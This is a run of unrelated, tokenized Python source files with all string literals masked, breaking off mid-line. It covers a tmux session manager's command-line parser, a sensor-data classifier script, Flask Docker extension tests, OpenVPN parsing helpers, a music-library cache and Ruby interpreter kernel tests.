<EOL> help = '<STR_LIT>' <EOL> ) <EOL> kill_session . set_defaults ( callback = command_kill_session ) <EOL> kill_session . add_argument ( <EOL> dest = '<STR_LIT>' , <EOL> type = str , <EOL> nargs = '<STR_LIT:+>' , <EOL> default = None , <EOL> help = '<STR_LIT>' , <EOL> ) . completer = SessionCompleter <EOL> attach_session = subparsers . add_parser ( <EOL> '<STR_LIT>' , <EOL> parents = [ server_parser , client_parser ] , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> attach_session . set_defaults ( callback = command_attach_session ) <EOL> attach_session . add_argument ( <EOL> dest = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:+>' , <EOL> type = str , <EOL> help = '<STR_LIT>' , <EOL> ) . completer = SessionCompleter <EOL> freeze = subparsers . add_parser ( <EOL> '<STR_LIT>' , <EOL> parents = [ server_parser ] , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> freeze . set_defaults ( callback = command_freeze ) <EOL> freeze . add_argument ( <EOL> dest = '<STR_LIT>' , <EOL> type = str , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = '<STR_LIT>' , <EOL> ) . completer = SessionCompleter <EOL> load = subparsers . add_parser ( <EOL> '<STR_LIT>' , <EOL> parents = [ server_parser , client_parser ] , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> load . add_argument ( <EOL> dest = '<STR_LIT>' , <EOL> type = str , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = '<STR_LIT>' <EOL> ) . completer = ConfigFileCompleter ( <EOL> allowednames = ( '<STR_LIT>' , '<STR_LIT>' ) , directories = False <EOL> ) <EOL> load . set_defaults ( callback = command_load ) <EOL> load . add_argument ( <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> default = None , <EOL> help = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' <EOL> ) <EOL> convert = subparsers . add_parser ( <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> convert . add_argument ( <EOL> dest = '<STR_LIT>' , <EOL> type = str , <EOL> default = None , <EOL> help = '<STR_LIT>' <EOL> ) . completer = ConfigFileCompleter ( <EOL> allowednames = ( '<STR_LIT>' , '<STR_LIT>' ) , directories = False <EOL> ) <EOL> convert . set_defaults ( callback = command_convert ) <EOL> importparser = subparsers . add_parser ( <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> importsubparser = importparser . add_subparsers ( <EOL> title = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> import_teamocil = importsubparser . add_parser ( <EOL> '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> ) <EOL> import_teamocilgroup = import_teamocil . add_mutually_exclusive_group ( <EOL> required = True <EOL> ) <EOL> import_teamocilgroup . add_argument ( <EOL> '<STR_LIT>' , dest = '<STR_LIT:list>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> import_teamocilgroup . add_argument ( <EOL> dest = '<STR_LIT>' , <EOL> type = str , <EOL> nargs = '<STR_LIT:?>' , <EOL> help = '''<STR_LIT>''' <EOL> ) . completer = TeamocilCompleter ( allowednames = ( '<STR_LIT>' ) , directories = False ) <EOL> import_teamocil . set_defaults ( callback = command_import_teamocil ) <EOL> import_tmuxinator = importsubparser . add_parser ( <EOL> '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> ) <EOL> import_tmuxinatorgroup = import_tmuxinator . add_mutually_exclusive_group ( <EOL> required = True ) <EOL> import_tmuxinatorgroup . add_argument ( <EOL> '<STR_LIT>' , dest = '<STR_LIT:list>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> import_tmuxinatorgroup . add_argument ( <EOL> dest = '<STR_LIT>' , <EOL> type = str , <EOL> nargs = '<STR_LIT:?>' , <EOL> help = '''<STR_LIT>''' <EOL> ) . completer = TmuxinatorCompleter ( allowednames = ( '<STR_LIT>' ) , directories = False ) <EOL> import_tmuxinator . set_defaults ( callback = command_import_tmuxinator ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> default = None , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:version>' , <EOL> version = '<STR_LIT>' % __version__ , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> return parser <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> parser = get_parser ( ) <EOL> argcomplete . autocomplete ( parser , always_complete_options = False ) <EOL> args = parser . parse_args ( ) <EOL> log_level = '<STR_LIT>' <EOL> if '<STR_LIT>' in args and isinstance ( args . log_level , string_types ) : <EOL> log_level = args . log_level . upper ( ) <EOL> setup_logger ( <EOL> level = log_level <EOL> ) <EOL> try : <EOL> util . has_required_tmux_version ( ) <EOL> except exc . TmuxpException as e : <EOL> logger . error ( e ) <EOL> sys . exit ( ) <EOL> util . oh_my_zsh_auto_title ( ) <EOL> t = Server ( <EOL> socket_name = args . socket_name , <EOL> socket_path = args . socket_path , <EOL> colors = args . colors <EOL> ) <EOL> try : <EOL> if not hasattr ( args , '<STR_LIT>' ) : <EOL> parser . print_help ( ) <EOL> elif args . callback is command_load : <EOL> command_load ( args ) <EOL> elif args . callback is command_convert : <EOL> command_convert ( args ) <EOL> elif args . callback is command_import_teamocil : <EOL> command_import_teamocil ( args ) <EOL> elif args . callback is command_import_tmuxinator : <EOL> command_import_tmuxinator ( args ) <EOL> elif args . callback is command_freeze : <EOL> command_freeze ( args ) <EOL> elif args . callback is command_attach_session : <EOL> command_attach_session ( args ) <EOL> elif args . callback is command_kill_session : <EOL> command_kill_session ( args ) <EOL> except KeyboardInterrupt : <EOL> pass </s>
<s> __author__ = '<STR_LIT>' <EOL> import sys <EOL> from modules . sensor . Gyroscope import * <EOL> from modules . sensor . Accelerometer import * <EOL> from modules . label . Label import * <EOL> from modules . feature . FeatureExtractor import * <EOL> from modules . classification . Recurrent import * <EOL> class Main : <EOL> def __init__ ( self , run_name = "<STR_LIT>" , use_statistical_features = False , preprocess_signal = True , use_heuristic_segmentation = False ) : <EOL> self . run_name = "<STR_LIT:_>" + run_name <EOL> self . view = View ( False , False , "<STR_LIT>" ) <EOL> self . use_statistical_features = use_statistical_features <EOL> self . preprocess_signal = preprocess_signal <EOL> self . use_heuristic_segmentation = use_heuristic_segmentation <EOL> def process_all ( self , sensors = "<STR_LIT>" , merge_axes = { "<STR_LIT:g>" : False , "<STR_LIT:a>" : False } ) : <EOL> for entry in os . listdir ( Path . RAW_PATH ) : <EOL> if entry . find ( "<STR_LIT>" ) != - <NUM_LIT:1> : <EOL> session_id = entry [ : entry . find ( "<STR_LIT:_>" ) ] <EOL> self . process ( session_id , sensors , merge_axes ) <EOL> def process ( self , session_id , sensors = "<STR_LIT>" , merge_axes = { "<STR_LIT:g>" : False , "<STR_LIT:a>" : False } ) : <EOL> data_path = Path . get_path ( Path . RAW_PATH , session_id ) + "<STR_LIT:_>" <EOL> output_path = Path . get_path ( Path . FEATURE_PATH , session_id ) <EOL> label = Label ( data_path ) <EOL> gyroscope = Gyroscope ( data_path , self . view , merge_axes [ "<STR_LIT:g>" ] , preprocess_signal = self . preprocess_signal ) <EOL> accelerometer = Accelerometer ( data_path , self . view , merge_axes [ "<STR_LIT:a>" ] , preprocess_signal = self . preprocess_signal ) <EOL> accelerometer . fit ( gyroscope . timestamp ) <EOL> feature_extractor = FeatureExtractor ( output_path , self . view , use_statistical_features = self . use_statistical_features ) <EOL> fusion = [ ] <EOL> for sensor in sensors : <EOL> if sensor == '<STR_LIT:g>' : <EOL> fusion . append ( gyroscope ) <EOL> if sensor == '<STR_LIT:a>' : <EOL> fusion . append ( accelerometer ) <EOL> if not self . use_heuristic_segmentation : <EOL> if label . has_label : <EOL> feature_extractor . segment_from_labels ( fusion , label ) <EOL> else : <EOL> feature_extractor . segment_heuristically ( fusion , gyroscope . get_mean_signal ( ) ) <EOL> else : <EOL> feature_extractor . segment_heuristically ( fusion , gyroscope . get_mean_signal ( ) , label ) <EOL> def get_classifier ( self , neurons_per_layer ) : <EOL> classifier = Recurrent ( neurons_per_layer ) <EOL> classifier . retrieve_samples ( Path . FEATURE_PATH ) <EOL> return classifier <EOL> def train ( self , iteration = <NUM_LIT:100> , neurons_per_layer = [ <NUM_LIT> , <NUM_LIT> ] ) : <EOL> classifier = self . get_classifier ( neurons_per_layer ) <EOL> classifier . train_model ( iteration ) <EOL> classifier . relevance . output_mean_square_mean_error ( "<STR_LIT>" . format ( Path . RESULT_PATH , self . run_name ) ) <EOL> def evaluate ( self ) : <EOL> classifier = Recurrent ( ) <EOL> classifier . retrieve_samples ( Path . FEATURE_PATH ) <EOL> classifier . evaluate ( ) <EOL> classifier . relevance . output_confusion_matrix ( "<STR_LIT>" . format ( Path . RESULT_PATH , self . run_name ) ) <EOL> classifier . relevance . output_statistics ( "<STR_LIT>" . format ( Path . RESULT_PATH ) , self . run_name ) <EOL> def cross_validation ( self , iteration = <NUM_LIT:100> , neurons_per_layer = [ <NUM_LIT> , <NUM_LIT> ] , k = <NUM_LIT:5> ) : <EOL> classifier = self . get_classifier ( neurons_per_layer ) <EOL> classifier . k_fold_cross_validate ( k , iteration ) <EOL> classifier . relevance . output_confusion_matrix ( "<STR_LIT>" . format ( Path . RESULT_PATH , self . run_name ) ) <EOL> classifier . relevance . output_statistics ( "<STR_LIT>" . format ( Path . RESULT_PATH ) , self . run_name ) <EOL> classifier . relevance . output_mean_square_mean_error ( "<STR_LIT>" . format ( Path . RESULT_PATH , self . run_name ) , k ) <EOL> def predict ( self , session_id ) : <EOL> self . process ( session_id ) <EOL> classifier = Recurrent ( ) <EOL> classifier . retrieve_sample ( "<STR_LIT>" . format ( Path . FEATURE_PATH , session_id ) , is_labelled = False ) <EOL> classifier . evaluate ( is_labelled = False ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> argv = sys . argv [ <NUM_LIT:1> : ] <EOL> length = len ( argv ) <EOL> if length < <NUM_LIT:1> : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> else : <EOL> mode = argv [ <NUM_LIT:0> ] <EOL> if mode == "<STR_LIT>" : <EOL> main = Main ( ) <EOL> if length == <NUM_LIT:2> : <EOL> main . process ( argv [ <NUM_LIT:1> ] ) <EOL> elif length > <NUM_LIT:2> : <EOL> s = argv [ <NUM_LIT:1> ] <EOL> m = argv [ <NUM_LIT:2> ] <EOL> a = { "<STR_LIT:g>" : False , "<STR_LIT:a>" : False } <EOL> for i in xrange ( <NUM_LIT:0> , len ( m ) , <NUM_LIT:2> ) : <EOL> c = m [ i ] + m [ i + <NUM_LIT:1> ] <EOL> sensor = c [ <NUM_LIT:0> ] <EOL> strategy = c [ <NUM_LIT:1> ] <EOL> a [ sensor ] = True if strategy == '<STR_LIT:y>' else False <EOL> main . process_all ( s , a ) <EOL> else : <EOL> main . process_all ( ) <EOL> elif mode == "<STR_LIT>" : <EOL> statistical = argv [ <NUM_LIT:1> ] <EOL> preprocessing = argv [ <NUM_LIT:2> ] <EOL> heuristic = argv [ <NUM_LIT:3> ] <EOL> use_statistical_features = False <EOL> preprocess_signal = True <EOL> use_heuristic_segmentation = False <EOL> if statistical == '<STR_LIT:y>' : <EOL> use_statistical_features = True <EOL> if preprocessing == '<STR_LIT:n>' : <EOL> preprocess_signal = False <EOL> if heuristic == '<STR_LIT:y>' : <EOL> use_heuristic_segmentation = True <EOL> main = Main ( use_statistical_features = use_statistical_features , preprocess_signal = preprocess_signal , use_heuristic_segmentation = use_heuristic_segmentation ) <EOL> main . process_all ( ) <EOL> elif mode == "<STR_LIT>" and length == <NUM_LIT:2> : <EOL> main = Main ( ) <EOL> main . predict ( argv [ <NUM_LIT:1> ] ) <EOL> else : <EOL> main = Main ( argv [ <NUM_LIT:1> ] ) <EOL> if mode == "<STR_LIT:train>" : <EOL> if length == <NUM_LIT:3> : <EOL> main . train ( int ( argv [ <NUM_LIT:2> ] ) ) <EOL> elif length > <NUM_LIT:3> : <EOL> main . train ( int ( argv [ <NUM_LIT:2> ] ) , [ int ( x ) for x in argv [ <NUM_LIT:3> : ] ] ) <EOL> else : <EOL> main . train ( ) <EOL> main . evaluate ( ) <EOL> elif mode == "<STR_LIT>" : <EOL> if length == <NUM_LIT:3> : <EOL> main . cross_validation ( int ( argv [ <NUM_LIT:2> ] ) ) <EOL> elif length > <NUM_LIT:3> : <EOL> main . cross_validation ( int ( argv [ <NUM_LIT:2> ] ) , [ int ( x ) for x in argv [ <NUM_LIT:3> : ] ] ) <EOL> else : <EOL> main . cross_validation ( ) <EOL> elif mode == "<STR_LIT>" : <EOL> main . evaluate ( ) </s>
<s> from flask import Flask , current_app <EOL> from flask_docker import Docker <EOL> from pytest import fixture , raises <EOL> import responses <EOL> docker = Docker ( ) <EOL> def create_app ( ) : <EOL> app = Flask ( __name__ ) <EOL> docker . init_app ( app ) <EOL> return app <EOL> @ fixture <EOL> def app ( request ) : <EOL> app = create_app ( ) <EOL> ctx = app . app_context ( ) <EOL> ctx . push ( ) <EOL> request . addfinalizer ( ctx . pop ) <EOL> return app <EOL> def test_factory ( ) : <EOL> assert docker . app is current_app <EOL> def test_out_of_context ( ) : <EOL> docker . app <EOL> with raises ( RuntimeError ) as error : <EOL> docker . app . name <EOL> assert error . value . args [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> with raises ( RuntimeError ) as error : <EOL> docker . client <EOL> assert error . value . args [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> def test_url_missing ( app ) : <EOL> with raises ( RuntimeError ) as error : <EOL> docker . client <EOL> assert error . value . args [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> @ responses . activate <EOL> def test_versioned ( app ) : <EOL> responses . add ( <EOL> responses . GET , '<STR_LIT>' , <EOL> body = '<STR_LIT>' , status = <NUM_LIT:200> , <EOL> content_type = '<STR_LIT:application/json>' ) <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> assert docker . client . info ( ) == { '<STR_LIT:message>' : '<STR_LIT>' } <EOL> def test_lazy_creation ( app ) : <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> assert app . extensions [ '<STR_LIT>' ] is None <EOL> client1 = docker . client <EOL> client2 = docker . client <EOL> assert app . extensions [ '<STR_LIT>' ] is client1 is client2 <EOL> def test_isolation ( ) : <EOL> app1 = create_app ( ) <EOL> app2 = create_app ( ) <EOL> app1 . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> app2 . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> docker1 = None <EOL> docker2 = None <EOL> with app1 . app_context ( ) : <EOL> docker1 = docker . client <EOL> with app2 . app_context ( ) : <EOL> docker2 = docker . client <EOL> assert docker1 is not docker2 </s>
<s> from __future__ import unicode_literals , absolute_import <EOL> import datetime <EOL> import collections <EOL> import ipaddress <EOL> from six import python_2_unicode_compatible as unicode_compatible <EOL> from humanize . filesize import naturalsize <EOL> DATETIME_FORMAT_OPENVPN = '<STR_LIT>' <EOL> def parse_time ( time ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( time , datetime . datetime ) : <EOL> return time <EOL> return datetime . datetime . strptime ( time , DATETIME_FORMAT_OPENVPN ) <EOL> def parse_peer ( peer ) : <EOL> if isinstance ( peer , PeerAddress ) : <EOL> return peer <EOL> host , port = peer . rsplit ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> return PeerAddress ( ipaddress . ip_address ( host ) , int ( port ) ) <EOL> def parse_filesize ( size ) : <EOL> if isinstance ( size , FileSize ) : <EOL> return size <EOL> return FileSize ( size ) <EOL> @ unicode_compatible <EOL> class PeerAddress ( collections . namedtuple ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> """<STR_LIT>""" <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . host , self . port ) <EOL> @ unicode_compatible <EOL> class FileSize ( int ) : <EOL> """<STR_LIT>""" <EOL> def __str__ ( self ) : <EOL> return self . humanize ( ) <EOL> def humanize ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return naturalsize ( self , ** kwargs ) </s>
<s> __version__ = "<STR_LIT:1.0>" </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import os , sys <EOL> from apigen import ApiDocWriter <EOL> from distutils . version import LooseVersion as V <EOL> def abort ( error ) : <EOL> print ( '<STR_LIT>' % error ) <EOL> exit ( ) <EOL> def assert_source_and_install_match ( package ) : <EOL> """<STR_LIT>""" <EOL> module = sys . modules [ package ] <EOL> installed_version = V ( module . version . version ) <EOL> setup_lines = open ( '<STR_LIT>' ) . readlines ( ) <EOL> for l in setup_lines : <EOL> if l . startswith ( '<STR_LIT>' ) : <EOL> source_version = V ( l . split ( "<STR_LIT:'>" ) [ <NUM_LIT:1> ] ) <EOL> break <EOL> if source_version != installed_version : <EOL> abort ( "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> package = '<STR_LIT>' <EOL> try : <EOL> __import__ ( package ) <EOL> except ImportError as e : <EOL> abort ( "<STR_LIT>" ) <EOL> outdir = '<STR_LIT>' <EOL> docwriter = ApiDocWriter ( package ) <EOL> docwriter . package_skip_patterns += [ r'<STR_LIT>' , <EOL> r'<STR_LIT>' , <EOL> ] <EOL> docwriter . write_api_docs ( outdir ) <EOL> docwriter . write_index ( outdir , '<STR_LIT>' , relative_to = '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' % len ( docwriter . written_modules ) ) </s>
<s> from sqlalchemy . orm . exc import NoResultFound <EOL> from shiva import models as m <EOL> from shiva . app import db <EOL> from shiva . utils import get_logger <EOL> q = db . session . query <EOL> log = get_logger ( ) <EOL> class CacheManager ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ram_cache = True , use_db = True ) : <EOL> log . debug ( '<STR_LIT>' ) <EOL> if not ram_cache : <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . ram_cache = ram_cache <EOL> self . use_db = use_db <EOL> self . artists = { } <EOL> self . albums = { } <EOL> self . hashes = set ( ) <EOL> def get_artist ( self , name ) : <EOL> artist = self . artists . get ( name ) <EOL> if not artist : <EOL> if self . use_db : <EOL> try : <EOL> artist = q ( m . Artist ) . filter_by ( name = name ) . one ( ) <EOL> except NoResultFound : <EOL> pass <EOL> if artist and self . ram_cache : <EOL> self . add_artist ( artist ) <EOL> return artist <EOL> def add_artist ( self , artist ) : <EOL> if self . ram_cache : <EOL> self . artists [ artist . name ] = artist <EOL> def get_album ( self , name , artist ) : <EOL> album = self . albums . get ( artist . name , { } ) . get ( name ) <EOL> if not album : <EOL> if self . use_db : <EOL> try : <EOL> album = q ( m . Album ) . filter_by ( name = name ) . one ( ) <EOL> except NoResultFound : <EOL> pass <EOL> if album and self . ram_cache : <EOL> self . add_album ( album , artist ) <EOL> return album <EOL> def add_album ( self , album , artist ) : <EOL> if self . ram_cache : <EOL> if not self . albums . get ( artist . name ) : <EOL> self . albums [ artist . name ] = { } <EOL> self . albums [ artist . name ] [ album . name ] = album <EOL> def add_hash ( self , hash ) : <EOL> if self . ram_cache : <EOL> self . hashes . add ( hash ) <EOL> def hash_exists ( self , hash ) : <EOL> if hash in self . hashes : <EOL> return True <EOL> if self . use_db : <EOL> return bool ( q ( m . Track ) . filter_by ( hash = hash ) . count ( ) ) <EOL> return False <EOL> def clear ( self ) : <EOL> self . artists = { } <EOL> self . albums = { } <EOL> self . hashes = set ( ) </s>
<s> from nose import tools as nose <EOL> import unittest <EOL> from mock import Mock <EOL> from shiva import app <EOL> class AppTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> app . app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> app . app . run = Mock ( ) <EOL> def test_main ( self ) : <EOL> app . main ( ) <EOL> nose . assert_true ( app . app . run . called ) </s>
<s> import os <EOL> import time <EOL> import pytest <EOL> from . . base import BaseTopazTest <EOL> class TestKernel ( BaseTopazTest ) : <EOL> def test_puts_nil ( self , space , capfd ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> out , err = capfd . readouterr ( ) <EOL> assert out == "<STR_LIT:\n>" <EOL> def test_print ( self , space , capfd ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> out , err = capfd . readouterr ( ) <EOL> assert out == "<STR_LIT>" <EOL> def test_p ( self , space , capfd ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> out , err = capfd . readouterr ( ) <EOL> assert out == "<STR_LIT>" <EOL> def test_lambda ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> w_cls , w_lambda = space . listview ( w_res ) <EOL> assert w_cls is space . w_proc <EOL> assert w_lambda is space . w_true <EOL> def test_proc ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> w_cls , w_lambda = space . listview ( w_res ) <EOL> assert w_cls is space . w_proc <EOL> assert w_lambda is space . w_false <EOL> def test_singleton_methods ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ ] <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ "<STR_LIT:foo>" ] <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ [ "<STR_LIT:foo>" ] , [ ] ] <EOL> def test_raise ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT:foo>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT:foo>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT:foo>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( """<STR_LIT>""" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( """<STR_LIT>""" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> def test_overriding_raise ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ '<STR_LIT:foo>' ] <EOL> def test_raise_error_subclass ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" , '<STR_LIT:foo>' ) : <EOL> space . execute ( """<STR_LIT>""" ) <EOL> def test_Array ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ [ "<STR_LIT>" ] , [ "<STR_LIT>" ] ] <EOL> assert self . unwrap ( space , space . execute ( "<STR_LIT>" ) ) == [ <NUM_LIT:1> ] <EOL> def test_String ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) == [ "<STR_LIT:hello>" , "<STR_LIT:4>" ] <EOL> def test_Integer ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) == [ <NUM_LIT:4> , <NUM_LIT> ] <EOL> def test_exit ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> def test_block_given_p ( self , space ) : <EOL> assert space . execute ( "<STR_LIT>" ) is space . w_false <EOL> assert space . execute ( "<STR_LIT>" ) is space . w_false <EOL> assert space . execute ( "<STR_LIT>" ) is space . w_false <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ False , True ] <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ False , True ] <EOL> def test_eqlp ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ True , False ] <EOL> def test_eval ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:6> <EOL> def test_responds_to ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) == [ False , True ] <EOL> def test_Float ( self , space ) : <EOL> assert space . float_w ( space . execute ( "<STR_LIT>" ) ) == <NUM_LIT:1.0> <EOL> assert space . float_w ( space . execute ( "<STR_LIT>" ) ) == <NUM_LIT> <EOL> assert space . float_w ( space . execute ( "<STR_LIT>" ) ) == <NUM_LIT> <EOL> assert space . float_w ( space . execute ( "<STR_LIT>" ) ) == <NUM_LIT> <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert space . float_w ( w_res ) == <NUM_LIT> <EOL> def test_loop ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> def test_sleep ( self , space ) : <EOL> now = time . time ( ) <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:0> <EOL> assert time . time ( ) - now >= <NUM_LIT> <EOL> now = time . time ( ) <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:0> <EOL> assert time . time ( ) - now >= <NUM_LIT> <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> def test_trust ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) is False <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ True , True , True ] <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ False , False , False ] <EOL> def test_taint ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) is False <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ True , True , True ] <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ False , False , False ] <EOL> def test_freeze ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) is False <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ True , False , True ] <EOL> def test_backtick ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) == "<STR_LIT>" <EOL> def test_backtick_sets_process_status ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == "<STR_LIT>" <EOL> class TestRequire ( BaseTopazTest ) : <EOL> def test_simple ( self , space , tmpdir ) : <EOL> f = tmpdir . join ( "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" ) <EOL> w_res = space . execute ( """<STR_LIT>""" % f ) <EOL> assert space . int_w ( w_res ) == - <NUM_LIT:5> <EOL> def test_no_ext ( self , space , tmpdir ) : <EOL> f = tmpdir . join ( "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" ) <EOL> w_res = space . execute ( """<STR_LIT>""" % str ( f ) [ : - <NUM_LIT:3> ] ) <EOL> assert space . int_w ( w_res ) == - <NUM_LIT:9> <EOL> def test_load_path ( self , space , tmpdir ) : <EOL> f = tmpdir . join ( "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" ) <EOL> w_res = space . execute ( """<STR_LIT>""" % tmpdir ) <EOL> assert space . int_w ( w_res ) == - <NUM_LIT:3> <EOL> def test_stdlib_default_load_path ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert w_res is space . w_true <EOL> def test_nonexistance ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> def test_already_loaded ( self , space , tmpdir ) : <EOL> f = tmpdir . join ( "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" ) <EOL> w_res = space . execute ( """<STR_LIT>""" % ( f , f , f ) ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:1> <EOL> def test_load ( self , space , tmpdir ) : <EOL> f = tmpdir . join ( "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" ) <EOL> w_res = space . execute ( """<STR_LIT>""" % ( f , f , f ) ) <EOL> assert space . 